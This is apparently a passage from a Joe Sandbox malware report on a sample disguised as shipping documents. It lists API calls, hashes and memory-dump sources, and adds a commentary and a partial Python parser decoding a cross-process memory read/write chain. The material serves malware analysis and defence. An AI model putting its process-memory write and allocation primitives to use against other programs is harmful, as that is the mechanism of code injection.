• Instruction Fuzzy Hash: EA219D30841608EFEB109F29DC54BAD7BE9FB42322F1486A6F811971F0D770989ACF94
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 780f00db40c7ccc75fcebc4349589304cced828d9261438f2d2dbad9b4b988f9
• Instruction ID: 12a45b54ab33a10c3d9ce708e4caf34370626f5c5107e7ebdc4e724541c028a5
• Opcode Fuzzy Hash: 780f00db40c7ccc75fcebc4349589304cced828d9261438f2d2dbad9b4b988f9
• Instruction Fuzzy Hash: 7501B5716081497BD7046B1A9D82FBBB3DCDE12398F1484A1FD29A7343FB50EE1096B0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00BB4ABA
• __beginthreadex.LIBCMT ref: 00BB4AD8
• MessageBoxW.USER32(?,?,?,?), ref: 00BB4AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BB4B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BB4B0A
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
• Opcode ID: 0420907f10fcae8d61a8a985e86577c83e93221c888ba9316243087eb93a1ffe
• Instruction ID: 132aa4f4a1f29f5dfdcbddccefdf0279074c0d79684ca02f6d48535d049de43e
• Opcode Fuzzy Hash: 0420907f10fcae8d61a8a985e86577c83e93221c888ba9316243087eb93a1ffe
• Instruction Fuzzy Hash: 2D11A576909615BBC7119FA89C04BEE7FECFB86320F1482A6F925D3251D7B5C90487A0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA821E
• GetLastError.KERNEL32(?,00BA7CE2,?,?,?), ref: 00BA8228
• GetProcessHeap.KERNEL32(00000008,?,?,00BA7CE2,?,?,?), ref: 00BA8237
• HeapAlloc.KERNEL32(00000000,?,00BA7CE2,?,?,?), ref: 00BA823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA8255
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 842720411-0
                                                                                    • Opcode ID: 3c9e05aff23b10ad6d010a793d2c43d8be760d9d45786a86d0f3ca2f4bf9dc5f
                                                                                    • Instruction ID: 291fa26f7870a52a92be68aa57c6798e7b0324fbd62b13b0b1ac2809fdb1a288
                                                                                    • Opcode Fuzzy Hash: 3c9e05aff23b10ad6d010a793d2c43d8be760d9d45786a86d0f3ca2f4bf9dc5f
                                                                                    • Instruction Fuzzy Hash: 4C016D71609205FFDB204FA5DC58D7BBBACEF8A754B50047AF90AC3220EE318D00CA60
                                                                                    APIs
                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?,?,00BA7455), ref: 00BA7127
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7142
                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA7150
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?), ref: 00BA7160
                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BA7044,80070057,?,?), ref: 00BA716C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3897988419-0
                                                                                    • Opcode ID: b11a965a8a49d6ca3124b2f20864b8c90e6547b1cef79e9b6998584b405a6b80
                                                                                    • Instruction ID: 75355857a1ce1a812e6dff0b5c09efad2f4284e202aca33413784c3a799def40
                                                                                    • Opcode Fuzzy Hash: b11a965a8a49d6ca3124b2f20864b8c90e6547b1cef79e9b6998584b405a6b80
                                                                                    • Instruction Fuzzy Hash: 22017C7260E205ABDB118F64DC44AAABBEDEB457A1F1440A5FD05E3220EF32DD409BA0
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB5260
                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BB526E
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB5276
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BB5280
                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BB52BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    • String ID:
                                                                                    • API String ID: 2833360925-0
                                                                                    • Opcode ID: 8ed7e89d3828c7c539ebb5ed314295a4840e7859bea778464ccd1d03788ebcbe
                                                                                    • Instruction ID: 89ca889db6e182335684be5c70bb861e6eb580bba4dac037cc5e94aabc344114
                                                                                    • Opcode Fuzzy Hash: 8ed7e89d3828c7c539ebb5ed314295a4840e7859bea778464ccd1d03788ebcbe
                                                                                    • Instruction Fuzzy Hash: 22010931D06A1ADBCF10AFA8E959AFDFBB8FB09711F40019AE942B3140DFB0555087A6
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA8121
                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA812B
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA813A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8141
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8157
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: 97837ef28578f18ed119426e51b10abc9f42a7c0b6b926fca76b56b19d9de6af
                                                                                    • Instruction ID: 3d508210f185a69b73c17bd1cba52a68b96073fcd073a212e829c9bd476dcce1
                                                                                    • Opcode Fuzzy Hash: 97837ef28578f18ed119426e51b10abc9f42a7c0b6b926fca76b56b19d9de6af
                                                                                    • Instruction Fuzzy Hash: D5F04F71209306AFEB110FA5EC98E777BACFF4A754B040076F986D7150EE719941DA60
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00BAC1F7
                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00BAC20E
                                                                                    • MessageBeep.USER32(00000000), ref: 00BAC226
                                                                                    • KillTimer.USER32(?,0000040A), ref: 00BAC242
                                                                                    • EndDialog.USER32(?,00000001), ref: 00BAC25C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3741023627-0
                                                                                    • Opcode ID: 0a610ce7894ba54bf8f4edd96990b8b704d43c3802a9bf4b9f551b80cb53e484
                                                                                    • Instruction ID: 9bb2afc92dd7d7ef74bc07fdc58db34242fb5ebe20644024cfc32bd308bc35e1
                                                                                    • Opcode Fuzzy Hash: 0a610ce7894ba54bf8f4edd96990b8b704d43c3802a9bf4b9f551b80cb53e484
                                                                                    • Instruction Fuzzy Hash: 4F01A73050830597EB205B50ED5EBA6BBF8FB01706F0002AAA553914E0DBF0A944CB50
                                                                                    APIs
                                                                                    • EndPath.GDI32(?), ref: 00B513BF
                                                                                    • StrokeAndFillPath.GDI32(?,?,00B8B888,00000000,?), ref: 00B513DB
                                                                                    • SelectObject.GDI32(?,00000000), ref: 00B513EE
                                                                                    • DeleteObject.GDI32 ref: 00B51401
                                                                                    • StrokePath.GDI32(?), ref: 00B5141C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                    • String ID:
                                                                                    • API String ID: 2625713937-0
                                                                                    • Opcode ID: de6a48e505564c825aea6d7e813b05059912699d8c76dc6cdd6583e37322b3ff
                                                                                    • Instruction ID: 32babe898353d879cdd5c37cde2479c19b8ac6be91221b97454e4fa8721bfa68
                                                                                    • Opcode Fuzzy Hash: de6a48e505564c825aea6d7e813b05059912699d8c76dc6cdd6583e37322b3ff
                                                                                    • Instruction Fuzzy Hash: 6CF01D30045609EBEB115F1AEC5C7AC7BE5F742326F08C265E82A4A1F1D7304596DF10
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 00BBC432
                                                                                    • CoCreateInstance.OLE32(00BE2D6C,00000000,00000001,00BE2BDC,?), ref: 00BBC44A
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • CoUninitialize.OLE32 ref: 00BBC6B7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2683427295-24824748
                                                                                    • Opcode ID: 9977bad676852488a2a5e8e37e2c5bffbe0b1026b93d2930bc4eea729c18d4ed
                                                                                    • Instruction ID: 96d25ce5618c715777dba571ad4481e3b629da5d18b50ee6519955c117ffe56d
                                                                                    • Opcode Fuzzy Hash: 9977bad676852488a2a5e8e37e2c5bffbe0b1026b93d2930bc4eea729c18d4ed
                                                                                    • Instruction Fuzzy Hash: 84A14DB1108205AFD700EF54C891EAFB7E8EF89345F0049ACF5559B1A2DB71E909CB52
                                                                                    APIs
                                                                                      • Part of subcall function 00B70DB6: std::exception::exception.LIBCMT ref: 00B70DEC
                                                                                      • Part of subcall function 00B70DB6: __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                      • Part of subcall function 00B57A51: _memmove.LIBCMT ref: 00B57AAB
                                                                                    • __swprintf.LIBCMT ref: 00B62ECD
                                                                                    Strings
                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B62D66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                    • API String ID: 1943609520-557222456
                                                                                    • Opcode ID: 99d7bc414b76c06ca00a2700747e2d4977139df5dd89bf4cf8a9037009546aba
                                                                                    • Instruction ID: f7a018c85978409d920cc69128658c042c34ab53d4545215014eb1fa21cc26b2
                                                                                    • Opcode Fuzzy Hash: 99d7bc414b76c06ca00a2700747e2d4977139df5dd89bf4cf8a9037009546aba
                                                                                    • Instruction Fuzzy Hash: 40919E712086019FDB14EF24D896D6EB7E8EF85711F0048EDF8559B2A1EB34ED48CB62
                                                                                    APIs
                                                                                      • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                                                    • CoInitialize.OLE32(00000000), ref: 00BBB9BB
                                                                                    • CoCreateInstance.OLE32(00BE2D6C,00000000,00000001,00BE2BDC,?), ref: 00BBB9D4
                                                                                    • CoUninitialize.OLE32 ref: 00BBB9F1
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2126378814-24824748
                                                                                    • Opcode ID: e3c64807a0b1efd88f0322ec15e1e85462ef4fe41af005a50fae0855401e50da
                                                                                    • Instruction ID: 366f0ebcb969bbbe5a4274d319f0fae481aecda34b48948335192f71be741723
                                                                                    • Opcode Fuzzy Hash: e3c64807a0b1efd88f0322ec15e1e85462ef4fe41af005a50fae0855401e50da
                                                                                    • Instruction Fuzzy Hash: F3A166756043019FCB10DF14C894E6ABBE5FF89314F148998F89A9B3A2CB71EC49CB91
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00B750AD
                                                                                      • Part of subcall function 00B800F0: __87except.LIBCMT ref: 00B8012B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__87except__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 2905807303-2276729525
                                                                                    • Opcode ID: 2c468d2eca5b99200ed587ef8bc9704e306b61b7370e081457e3801984ee1244
                                                                                    • Instruction ID: 31d1a51c79c1af23fe5d4efa5cf1fc56d1fb1c18a15fcc8439d52f06f6a00a47
                                                                                    • Opcode Fuzzy Hash: 2c468d2eca5b99200ed587ef8bc9704e306b61b7370e081457e3801984ee1244
                                                                                    • Instruction Fuzzy Hash: 84515A2192C60186DB617B24C84536E2BD4EB41790F30CDD9F4E9862B9DFB489D8DB86
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$_memmove
                                                                                    • String ID: ERCP
                                                                                    • API String ID: 2532777613-1384759551
                                                                                    • Opcode ID: 15e4e9ad24aed05673a023cab396152b124b0b2878114927e4803bd828a5b0a1
                                                                                    • Instruction ID: b3f22c91f5a50c8d084488386683625b3cd80e936139b3f2b96bb2570f400acd
                                                                                    • Opcode Fuzzy Hash: 15e4e9ad24aed05673a023cab396152b124b0b2878114927e4803bd828a5b0a1
                                                                                    • Instruction Fuzzy Hash: 2F51A171900305DBDB24DF69C881BAAB7E4EF44304F2085BEE95AD7291E774EA44CB40
                                                                                    APIs
                                                                                      • Part of subcall function 00BB14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA9296,?,?,00000034,00000800,?,00000034), ref: 00BB14E6
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00BA983F
                                                                                      • Part of subcall function 00BB1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00BB14B1
                                                                                      • Part of subcall function 00BB13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00BB1409
                                                                                      • Part of subcall function 00BB13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00BA925A,00000034,?,?,00001004,00000000,00000000), ref: 00BB1419
                                                                                      • Part of subcall function 00BB13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00BA925A,00000034,?,?,00001004,00000000,00000000), ref: 00BB142F
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA98AC
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA98F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4150878124-2766056989
                                                                                    • Opcode ID: c9e8b59e43d1e5195fe949a867c957a5d0f6f8220bb6e70614252269541fadb1
                                                                                    • Instruction ID: dd9fc8ce328a927a6e325164ee9a9d4aea107a5927c62c1f26b395bed1f9315b
                                                                                    • Opcode Fuzzy Hash: c9e8b59e43d1e5195fe949a867c957a5d0f6f8220bb6e70614252269541fadb1
                                                                                    • Instruction Fuzzy Hash: B7415E76901218BFCB10DFA4CC91AEEBBB8EB4A300F004099FA45B7181DA706E45DFA0
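                                                                                    The record above is the one place in this listing where the report's "Writes to foreign memory regions" chain is visible end to end: GetWindowThreadProcessId resolves a window handle to its owning process, OpenProcess asks for 0x438 (PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION), VirtualAllocEx commits (0x1000) a PAGE_READWRITE (0x4) buffer in that process, and the helpers at 00BB14BC and 00BB1487 write and read that buffer around SendMessageW calls. The message values are tree-view messages (0x1104 = TVM_GETITEMRECT, 0x1111 = TVM_HITTEST), and the 0x1004 and 0x1073 values further along the OpenProcess and ReadProcessMemory argument dumps read, as list-view messages, as LVM_GETITEMCOUNT and LVM_GETITEMTEXTW. None of these messages is marshalled across a process boundary; their lParam points at a structure that must be readable in the target process, so any program that reads another process's common controls (the report classifies this sample as a compiled AutoIt script, and the ">>>AUTOIT NO CMDEXECUTE<<<" string appears at 00B54C11 below) has to use exactly the four APIs a process injector uses. What separates the two in a record like this is everything around the four calls: PAGE_READWRITE rather than PAGE_EXECUTE_READWRITE, a ReadProcessMemory that fetches the result back, and no CreateRemoteThread, SetThreadContext or QueueUserAPC in this function, so the report's thread-context and APC signatures have to be traced to a different record. The Python below is an added example and not part of the Joe Sandbox report; it parses bullet lines in the format used on this page (the sample input is the eight lines above, copied verbatim), expands the access mask, names the messages while disambiguating the 0x1000 range that SysListView32 and SysMonthCal32 share, and summarises the cross-process primitive. The constant tables are Windows SDK values; the helper names are this example's own.

```python
"""Decode the API bullet lines of one Joe Sandbox function record (added example)."""
import re
from collections import namedtuple

# Constructed input: the eight API lines of the record above, copied verbatim.
SAMPLE_RECORD = """
• Part of subcall function 00BB14BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA9296,?,?,00000034,00000800,?,00000034), ref: 00BB14E6
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00BA983F
• Part of subcall function 00BB1487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00BA92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00BB14B1
• Part of subcall function 00BB13DE: GetWindowThreadProcessId.USER32(?,?), ref: 00BB1409
• Part of subcall function 00BB13DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00BA925A,00000034,?,?,00001004,00000000,00000000), ref: 00BB1419
• Part of subcall function 00BB13DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00BA925A,00000034,?,?,00001004,00000000,00000000), ref: 00BB142F
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA98AC
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00BA98F9
"""

Call = namedtuple("Call", "api module args ref subcall")
LINE_RE = re.compile(r"(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
                     r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-F]{8})")

# OpenProcess dwDesiredAccess bits and VirtualAllocEx flProtect values (winnt.h).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Common-control messages by window class (commctrl.h).  The 0x1000 block is shared by
# SysListView32 (LVM_FIRST) and SysMonthCal32 (MCM_FIRST); 0x1100 (TV_FIRST) belongs to
# SysTreeView32 alone, so a value there can be named without knowing the class.
MESSAGES = {
    "SysTreeView32": {0x1104: "TVM_GETITEMRECT", 0x1105: "TVM_GETCOUNT", 0x110A: "TVM_GETNEXTITEM",
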